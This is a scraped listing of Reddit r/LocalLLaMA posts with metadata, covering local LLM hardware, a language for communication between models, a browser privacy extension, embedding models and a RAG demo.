[https://github.com/Jitera-Labs/prompt\_mixer.exe](https://github.com/Jitera-Labs/prompt_mixer.exe) | 2026-02-11T15:46:24 | https://v.redd.it/1ncpctr3zvig1 | Everlier | /r/LocalLLaMA/comments/1r20udz/prompt_mixer_a_desktop_app_to_steer_your_llm_in/ | 1970-01-01T00:00:00 | 0 | {} | 1r20udz | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/1ncpctr3zvig1/DASHPlaylist.mpd?a=1773546394%2CM2ZhYjE5YmYxZGQ1NmRlM2Y4ZjY0YjFjMzA1YjBhYmNiMWY2YWQ5YjFkOWMyYzFmYzU4YWFiZjBlMzgwZWIxMQ%3D%3D&v=1&f=sd', 'duration': 98, 'fallback_url': 'https://v.redd.it/1ncpctr3zvig1/CMAF_1080.mp4?source=fallback', 'has_audio': False, 'height': 1080, 'hls_url': 'https://v.redd.it/1ncpctr3zvig1/HLSPlaylist.m3u8?a=1773546394%2CZjY2NzRlM2QxZmQ4MjVkODVhZjQyMGVjNWE2NTg2NzU2MzE1MmZmOWMxMjhlYzRhNWQ5NTgzMDM1NDliYmE1Zg%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/1ncpctr3zvig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1686}} | t3_1r20udz | /r/LocalLLaMA/comments/1r20udz/prompt_mixer_a_desktop_app_to_steer_your_llm_in/ | false | false | 1 | {'enabled': False, 'images': [{'id': 'aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz', 'resolutions': [{'height': 69, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=108&crop=smart&format=pjpg&auto=webp&s=a9d51b6fabe38ad96be699e160e83e71772c3627', 'width': 108}, {'height': 138, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=216&crop=smart&format=pjpg&auto=webp&s=f70f89c28ca744cf5eb4598b0579aa92c476a54b', 'width': 216}, {'height': 204, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=320&crop=smart&format=pjpg&auto=webp&s=6ab7b6142c67ad5c4bc1f120e74621821b84f406', 'width': 320}, {'height': 409, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=640&crop=smart&format=pjpg&auto=webp&s=3d35e762214e5ddd90f9c87e30a4411de2c141b5', 'width': 640}, {'height': 614, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=960&crop=smart&format=pjpg&auto=webp&s=25ec89eeaf8565eabd481a51431fdd30906fad0f', 'width': 960}, {'height': 691, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=1080&crop=smart&format=pjpg&auto=webp&s=b6ea335d95e1874e773790f1e44bd23fef059372', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?format=pjpg&auto=webp&s=78fa4c72171b28412e0507b6514cf4f75c43d216', 'width': 1686}, 'variants': {}}]} | |
A compiled programming language for LLM-to-LLM communication - neutral to negative on single models, but appears to be transformative in multi-model mesh. | 0 | I’m a systems researcher (PhD, 30+ publications) with a health background who spent a career as a data analyst. Last year I dove into AI hard, focusing on multi-model meshes and model to model communication. This paper describes Kernel Language (KL), a compiled programming language for LLMs to communicate with each other, not humans.
The problem: almost all multi-agent frameworks use natural language for agent communication. But natural language is lossy, and so much drift occurs when multiple modes work on the same task, you are usually better off using a single agent per task, which creates a quality ceiling.
KL gets around this by replacing the primary communication method with a compiled language built on a kernel periodic table (80 families making up 577 reasoning primitives, covering optimization, inference, learning, creativity, mathematical proofs, etc.). A compiler rejects any model output that doesn’t meet the language specifications, but, it ignores comments. And this is key. Models can and do read the comment layer, so you get the reliability of a compiled language’s logical rigor and the nuance of natural language all at the same time.
We tested KL vs natural language on frontier models, mid-sized open source models, and small open source models, individually, as well as a multi-mesh of the frontier models, on two unrelated complex problems. The result that surprised us, KL is neutral to slightly negative for individual frontier models working solo, and slightly negative for mid sized models, and crushing for small models.. They trade creativity for logical rigor (or in the case of small models, collapse). But for multi-mesh coordination of frontier models, it was transformative. The KL enabled mesh produced the highest quality output across all other modalities, including emergent capabilities (adversarial self critique and iterative proof strengthening) that no solo model produced on its own in either modality (or the natural language mesh).
The test battery is small, six conditions, twelve total responses, which I am up front about in the paper. But the effect replicated across two unrelated domains, which is encouraging. The implications are that communication medium is as important as the models themselves, and natural language is both a bottle neck, and a necessity.
If interested in looking over the study, here is the link to the white paper: [https://sifsystemsmcrd.com/KL\_White\_Paper.pdf](https://sifsystemsmcrd.com/KL_White_Paper.pdf)
Would love to hear feedback. Thank you. | 2026-02-11T15:41:21 | https://www.reddit.com/r/LocalLLaMA/comments/1r20pio/a_compiled_programming_language_for_llmtollm/ | Repulsive-Two6317 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20pio | false | null | t3_1r20pio | /r/LocalLLaMA/comments/1r20pio/a_compiled_programming_language_for_llmtollm/ | false | false | self | 0 | null |
[Release] Q-Lite: Ultra-lightweight LLM gateway (69KB, runs on ESP32/Pico/STM32) | 1 | [removed] | 2026-02-11T15:36:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r20kii/release_qlite_ultralightweight_llm_gateway_69kb/ | RalpBigBear | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20kii | false | null | t3_1r20kii | /r/LocalLLaMA/comments/1r20kii/release_qlite_ultralightweight_llm_gateway_69kb/ | false | false | self | 1 | {'enabled': False, 'images': [{'id': 'vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=108&crop=smart&auto=webp&s=10b13a8d9118c8f1af2e9fd75086b9a2b5cc41dd', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=216&crop=smart&auto=webp&s=e1e46f4fc2e33e11f84d2a0b3004229c99d9eb5a', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=320&crop=smart&auto=webp&s=7950c8d96cead3ba59ab189c62becffe5bb31b1e', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=640&crop=smart&auto=webp&s=0ca2576200d3226d5b44788127c41d4c8da8246a', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=960&crop=smart&auto=webp&s=e8dc69286a3240eb2a48ae29404fdb4f40fc7b47', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=1080&crop=smart&auto=webp&s=9b7041c3b0598a8d79c245f9305208c854ecdfa5', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?auto=webp&s=3e54286c8881a3670507e35d8703c131e786a25f', 'width': 1200}, 'variants': {}}]} |
I'm a garlic farmer with no PC — I had AIs build a rough security gate for OpenClaw from my phone. 171 tests passed (sandbox). | 1 | [removed] | 2026-02-11T15:35:35 | https://www.reddit.com/r/LocalLLaMA/comments/1r20k2v/im_a_garlic_farmer_with_no_pc_i_had_ais_build_a/ | amadale | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20k2v | false | null | t3_1r20k2v | /r/LocalLLaMA/comments/1r20k2v/im_a_garlic_farmer_with_no_pc_i_had_ais_build_a/ | false | false | self | 1 | {'enabled': False, 'images': [{'id': 'BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=108&crop=smart&auto=webp&s=210969840104fefe5a740c14a049ba6ae9f4da1a', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=216&crop=smart&auto=webp&s=4884c88257a74f96353b7ca71d7749b6b7408185', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=320&crop=smart&auto=webp&s=6767f329a451c7b10e4b36109b3f7ce919c6c511', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=640&crop=smart&auto=webp&s=bcb0d160a488e8838d6bd1de9314d5614095d98a', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=960&crop=smart&auto=webp&s=d51c3521f7164a737cdf1eaf37fe880d9b4b6f45', 'width': 960}, {'height': 567, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=1080&crop=smart&auto=webp&s=4d3aa798813a7bdaf4f1915a05cc71f6345b0d17', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?auto=webp&s=ee4222e7ba222f9a3ab6fecbcc8435b9c9c571aa', 'width': 1200}, 'variants': {}}]} |
Mini AI Machine | 60 | I do a lot of text processing & generation on small model. RTX 4000 Blackwell SFF (75W max) + 32GB DDR5 + DeskMeet 8L PC running PopOS and vLLM 🎉
Anyone else has mini AI rig? | 2026-02-11T15:14:31 | KnownAd4832 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r2005l | false | null | t3_1r2005l | /r/LocalLLaMA/comments/1r2005l/mini_ai_machine/ | false | false | default | 60 | {'enabled': True, 'images': [{'id': '4vmjqryjtvig1', 'resolutions': [{'height': 144, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=108&crop=smart&auto=webp&s=c2dadfcc9cd38c33aea2a00d57988c64d0975d51', 'width': 108}, {'height': 288, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=216&crop=smart&auto=webp&s=893be2e80a8a24ddf581dd78bd6ff9ccf3757758', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=320&crop=smart&auto=webp&s=1e50181eba146eed49d0853aed23cb9e9ec577b7', 'width': 320}, {'height': 853, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=640&crop=smart&auto=webp&s=c30c9580fd072df0983a74667d5a2fb1848c656e', 'width': 640}, {'height': 1280, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=960&crop=smart&auto=webp&s=752d7e8e36e14935beb7aaaad651f8f112123d50', 'width': 960}, {'height': 1440, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=1080&crop=smart&auto=webp&s=835aefb4117f89722713bb4746851eeeb3687b9d', 'width': 1080}], 'source': {'height': 5712, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?auto=webp&s=02384e81f26ff581e7597112b44185e3e2ef6bfc', 'width': 4284}, 'variants': {}}]} | |
Are you guys using tools for AI Agent observability and cost tracking? | 2 | I'm currently working on pivoting my startup to tackle this specific market, but I want to get an idea for how people are currently controling their agents performance and token cost.
Is this of common use? | 2026-02-11T15:07:54 | https://www.reddit.com/r/LocalLLaMA/comments/1r1ztwk/are_you_guys_using_tools_for_ai_agent/ | UcreiziDog | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1ztwk | false | null | t3_1r1ztwk | /r/LocalLLaMA/comments/1r1ztwk/are_you_guys_using_tools_for_ai_agent/ | false | false | self | 2 | null |
[Showcase] I built a browser-based "Privacy Firewall" for LLMs using Rust + WASM (works with Ollama) | 0 | # Sunder – A local privacy firewall for AI chats (Rust/WASM Chrome Extension)
Hey everyone,
Like many of you, I use LLMs daily — but I've always been uneasy about pasting sensitive data (emails, client names, transaction IDs) into cloud providers like OpenAI or Anthropic. Even with "privacy mode" toggled on, I don't fully trust what happens on the other side.
So I built **Sunder**: a Chrome extension that acts as a local privacy firewall between you and any AI chat interface.
## How it works
Sunder follows a **zero-trust** model — it assumes every provider will store your input, and strips sensitive data before it ever leaves your browser.
1. **Intercept** — You type normally. Sunder catches your input before it hits the network.
2. **Protect** — It runs pattern matching locally (Rust compiled to WASM) and swaps sensitive values for tokens:
- `john.doe@gmail.com` → `[EMAIL_1]`
- `$50,000` → `[MONEY_1]`
- `4242 4242 4242 4242` → `[CARD_1]`
3. **Send** — The LLM receives the sanitized prompt. It has full context, but zero PII.
4. **Reveal** — When the response comes back ("Draft an email to [EMAIL_1]…"), Sunder swaps the real values back in — entirely locally.
The AI never sees your actual data. You never lose context.
## Tech stack
- **Core engine:** Rust → WebAssembly (fast, no network calls, runs in-browser)
- **Extension:** Plasmo (React-based Chrome extension framework)
- **Storage:** 100% local — an in-memory "Identity Vault" that never touches a server
## What it supports today
The extension currently works on **ChatGPT, Claude, Gemini, Perplexity, DeepSeek, and Copilot**. I also added a local dashboard with **Ollama** support, so you can go fully air-gapped if you want — local model + local privacy layer.
## Where I need help 🦀
I'm not a seasoned Rust developer. The current MVP handles regex-based patterns (emails, dates, money, cards) well, but I'm struggling with efficient **Named Entity Recognition (NER)** in WASM — catching names and other contextual PII without blowing up the binary size.
If you're into Rust, privacy engineering, or browser extensions, I'd love for you to roast my code or contribute. PRs, issues, and ideas are all welcome.
## Links
- **GitHub:** [github.com/awixor/sunder-ai](https://github.com/awixor/sunder-ai)
- **Live demo:** [sunder-ai-dashboard.vercel.app](https://sunder-ai-dashboard.vercel.app/)
Would you use something like this? Or am I over-engineering my paranoia?
| 2026-02-11T14:56:18 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zj0b/showcase_i_built_a_browserbased_privacy_firewall/ | AWX-Houcine | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zj0b | false | null | t3_1r1zj0b | /r/LocalLLaMA/comments/1r1zj0b/showcase_i_built_a_browserbased_privacy_firewall/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': 'c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=108&crop=smart&auto=webp&s=615e57d824e3032f4481ddd96bdb53042e33f16b', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=216&crop=smart&auto=webp&s=1bd77602747beb9ba912a8d4629959f758c7e8de', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=320&crop=smart&auto=webp&s=cfd97b8cdf5306b4a3065b2a3fbd37ed203b553d', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=640&crop=smart&auto=webp&s=8a694a4ccca1fee5bc585108ddab4121ecc19d47', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=960&crop=smart&auto=webp&s=6088869235e76d4498e7eb7af2fc188f5777e8c3', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=1080&crop=smart&auto=webp&s=d6dbd832774c437399371cc6570714f10dc9b101', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?auto=webp&s=0797147f28d7526abd0286472f1eab8ac7607516', 'width': 1200}, 'variants': {}}]} |
Anyone running Qwen3 VL embeddings? | 6 | So I've been trying to get the Qwen3 VL Embedding 2B model running locally with vLLM following the official instructions and I'm kinda confused by the vram usage. On my 4090 it's eating up 20+ gb even with a small 8k context window which seems insane for a 2B model. For comparison I can run qwen3 vl 4b through ollama with a bigger context window and it uses way less vram. Has anyone actually gotten this model running efficiently? I feel like I'm missing something obvious here. Also wondering if there's any way to quantize it to Q4 or Q8 right now? I've looked around and can't find any proper quants besides an FP8 and some GGUFs that didn’t really work for me. LLM compressor doesn’t seem to have support for it. | 2026-02-11T14:53:56 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zguk/anyone_running_qwen3_vl_embeddings/ | neeeser | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zguk | false | null | t3_1r1zguk | /r/LocalLLaMA/comments/1r1zguk/anyone_running_qwen3_vl_embeddings/ | false | false | self | 6 | null |
Dialogue Speech Generation: MOSS-TTSD-v1.0 vs Eleven v3 | 7 | 2026-02-11T14:53:24 | https://v.redd.it/3evtav0rpvig1 | Xiami2019 | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1zgci | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/3evtav0rpvig1/DASHPlaylist.mpd?a=1773413619%2CNzFiMGE0MjBkZTU4MzE2YjgwYmE3NWU2ZGNjYjdkMjQ0OGYzN2Y2MDNlNmIxYzI2MjY2YTIzNTk3OGEyNzAzOQ%3D%3D&v=1&f=sd', 'duration': 51, 'fallback_url': 'https://v.redd.it/3evtav0rpvig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1080, 'hls_url': 'https://v.redd.it/3evtav0rpvig1/HLSPlaylist.m3u8?a=1773413619%2CZjNjZTFhMTFhYWM1MzU3ZDI1YTEyYTVhZTBmYWQyYTk5NzNlMDE0NDcxZDIzYjA2ZjczYTA3NzUzOTNmMjk2NA%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/3evtav0rpvig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1920}} | t3_1r1zgci | /r/LocalLLaMA/comments/1r1zgci/dialogue_speech_generation_mossttsdv10_vs_eleven/ | false | false | 7 | {'enabled': False, 'images': [{'id': 'ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=108&crop=smart&format=pjpg&auto=webp&s=ff870cf63543f07cd567a08c5efc4e816bcb1b63', 'width': 108}, {'height': 121, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=216&crop=smart&format=pjpg&auto=webp&s=c79ca6b0ceacac2a8320c52f7b803fcb8c3f3b26', 'width': 216}, {'height': 180, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=320&crop=smart&format=pjpg&auto=webp&s=e9cf85a7e1550bfc0212ffabc417e228a09c09ac', 'width': 320}, {'height': 360, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=640&crop=smart&format=pjpg&auto=webp&s=fcc7aa4537c158a1612e4483184c741100bbce84', 'width': 640}, {'height': 540, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=960&crop=smart&format=pjpg&auto=webp&s=871afcb8b54e3a475ae945cc7901a11f53faecc8', 'width': 960}, {'height': 607, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=1080&crop=smart&format=pjpg&auto=webp&s=b0fc77fe8d929968cac2d0c6050ce62476db68c9', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?format=pjpg&auto=webp&s=8ce8630cdc677370cd304c6ff1640e85c67bbe8d', 'width': 1920}, 'variants': {}}]} | ||
What are the best amd thta can run 2b model ? | 1 | I want tò run theese model on 3 GPU fastest way possible
Qwen3-TTS--1.7B--
Qwen3--1.7B-- on vllm
My2.5
Best amd gpu? | 2026-02-11T14:52:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zfj7/what_are_the_best_amd_thta_can_run_2b_model/ | Quiet_Dasy | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zfj7 | false | null | t3_1r1zfj7 | /r/LocalLLaMA/comments/1r1zfj7/what_are_the_best_amd_thta_can_run_2b_model/ | false | false | self | 1 | null |
GLM 5 said its Gemini | 0 | I saw the latest release post and decided to ask it a simple question, in which it replied it's gemini. Then I retried and it replied correctly.
https://preview.redd.it/4fnlf24aovig1.png?width=2654&format=png&auto=webp&s=b78e73059cc71078de0ef662b583d1bca2f8b0c4
| 2026-02-11T14:45:20 | https://www.reddit.com/r/LocalLLaMA/comments/1r1z8zp/glm_5_said_its_gemini/ | Resident-Ad-5419 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1z8zp | false | null | t3_1r1z8zp | /r/LocalLLaMA/comments/1r1z8zp/glm_5_said_its_gemini/ | false | false | 0 | null | |
MiniMax M2.5 Coming Soon... | 29 | 2026-02-11T14:37:25 | Difficult-Cap-7527 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1z1wp | false | null | t3_1r1z1wp | /r/LocalLLaMA/comments/1r1z1wp/minimax_m25_coming_soon/ | false | false | 29 | {'enabled': True, 'images': [{'id': 'zlko1raxmvig1', 'resolutions': [{'height': 131, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=108&crop=smart&auto=webp&s=04951029341ceb2bd97dc92b3c3193078993cd65', 'width': 108}, {'height': 263, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=216&crop=smart&auto=webp&s=21d3e2e97a4364cc38de51cf2c5c49b3f88bbc64', 'width': 216}, {'height': 390, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=320&crop=smart&auto=webp&s=54c4f5c81b13ee4c37f25eb424262c1a65293fd4', 'width': 320}, {'height': 780, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=640&crop=smart&auto=webp&s=294b5efdef1efac438659373aca5f13743e0b1e6', 'width': 640}, {'height': 1170, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=960&crop=smart&auto=webp&s=48dea2842cef744641c597872b54d405985f59d7', 'width': 960}, {'height': 1316, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=1080&crop=smart&auto=webp&s=26cd408fec1dd08a56330fbd237ebe096d937c76', 'width': 1080}], 'source': {'height': 1463, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?auto=webp&s=fa5c8ceef2cf03d46f5c4706574ea2ca1476f5ca', 'width': 1200}, 'variants': {}}]} | |||
Epstein RAG+Heretic-LLM on 25303 Epstein files | 4 | It's running on colab's free tier, will be up for \~6 hours
[https://pro-pug-powerful.ngrok-free.app/](https://pro-pug-powerful.ngrok-free.app/)
https://preview.redd.it/fit9p5wkmvig1.png?width=1784&format=png&auto=webp&s=dff535539c3fa5b5324c007efb7f83faa4a79933
Source: [https://www.reddit.com/r/LocalLLaMA/comments/1ozu5v4/20000\_epstein\_files\_in\_a\_single\_text\_file/](https://www.reddit.com/r/LocalLLaMA/comments/1ozu5v4/20000_epstein_files_in_a_single_text_file/) | 2026-02-11T14:36:41 | https://www.reddit.com/r/LocalLLaMA/comments/1r1z1aj/epstein_raghereticllm_on_25303_epstein_files/ | Basel_Ashraf_Fekry | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1z1aj | false | null | t3_1r1z1aj | /r/LocalLLaMA/comments/1r1z1aj/epstein_raghereticllm_on_25303_epstein_files/ | false | false | 4 | null | |
MOSS-TTS with Best Discret Audio Tokenizer | 3 | The best open-source discrete audio tokenizer you can find.
[https://github.com/OpenMOSS/MOSS-Audio-Tokenizer](https://github.com/OpenMOSS/MOSS-Audio-Tokenizer) | 2026-02-11T14:34:10 | https://www.reddit.com/r/LocalLLaMA/comments/1r1yz0j/mosstts_with_best_discret_audio_tokenizer/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1yz0j | false | null | t3_1r1yz0j | /r/LocalLLaMA/comments/1r1yz0j/mosstts_with_best_discret_audio_tokenizer/ | false | false | self | 3 | {'enabled': False, 'images': [{'id': 'hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=108&crop=smart&auto=webp&s=3ae011eb7590f66d56a0a9ef48d40d89e4b7037b', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=216&crop=smart&auto=webp&s=78d8739ccba0ef365562e09893a550cb0d4a4262', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=320&crop=smart&auto=webp&s=b37fd729efc92efa0a9bf969e61cd7aacc1e84c5', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=640&crop=smart&auto=webp&s=6518631d740a68906393414a7a0c6e1130abc156', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=960&crop=smart&auto=webp&s=31aa3bd303834fa9590dde223428dbfc1c2b9fde', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=1080&crop=smart&auto=webp&s=3d7132d84d27cfbb5144301b978d98110176c60a', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?auto=webp&s=7f5ed31236039f4615867a8fbb3f2b07b20ff00f', 'width': 1200}, 'variants': {}}]} |
LMAO! Qwen developer accidentally leaked the internal model name in the "DEMO3" video! | 1 | [removed] | 2026-02-11T14:31:19 | Elegant_Mulberry4946 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1ywe5 | false | null | t3_1r1ywe5 | /r/LocalLLaMA/comments/1r1ywe5/lmao_qwen_developer_accidentally_leaked_the/ | true | false | spoiler | 1 | {'enabled': True, 'images': [{'id': 'ybpj4a5tlvig1', 'resolutions': [{'height': 34, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=108&crop=smart&auto=webp&s=2d6ed4ef5d1a9d3895011db9efac0ab8e23ebf87', 'width': 108}, {'height': 69, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=216&crop=smart&auto=webp&s=bd11932543516ea0d9160b8651cdf372431da13b', 'width': 216}, {'height': 103, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=320&crop=smart&auto=webp&s=bd25f7abe39219ef8cc4fb9ef77fbf879814090d', 'width': 320}, {'height': 206, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=640&crop=smart&auto=webp&s=def12a5019ba15819c9f032f6b9dcf6be4ddd27e', 'width': 640}], 'source': {'height': 246, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?auto=webp&s=2fb700e5812e2a8a11871bb7831d7c4d5f37ee3e', 'width': 761}, 'variants': {'obfuscated': {'resolutions': [{'height': 34, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=d6a5594a293c58bce7da4b983f29f81d842a1538', 'width': 108}, {'height': 69, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=e0c3c649542ab58d2c6c380b4d2fb0524aee3165', 'width': 216}, {'height': 103, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=c9d88d6f98ebf69740d929c87fc0012972cc7971', 'width': 320}, {'height': 206, 